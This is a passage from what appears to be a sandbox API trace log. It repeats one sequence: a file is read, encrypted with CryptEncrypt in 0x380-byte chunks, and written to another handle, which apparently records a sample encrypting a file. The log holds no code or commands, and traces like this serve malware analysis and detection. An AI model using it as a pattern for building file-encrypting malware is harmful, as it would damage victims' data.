| out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.972] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.989] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.989] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.990] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.991] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.993] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.994] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.995] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.996] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] ReadFile (in: 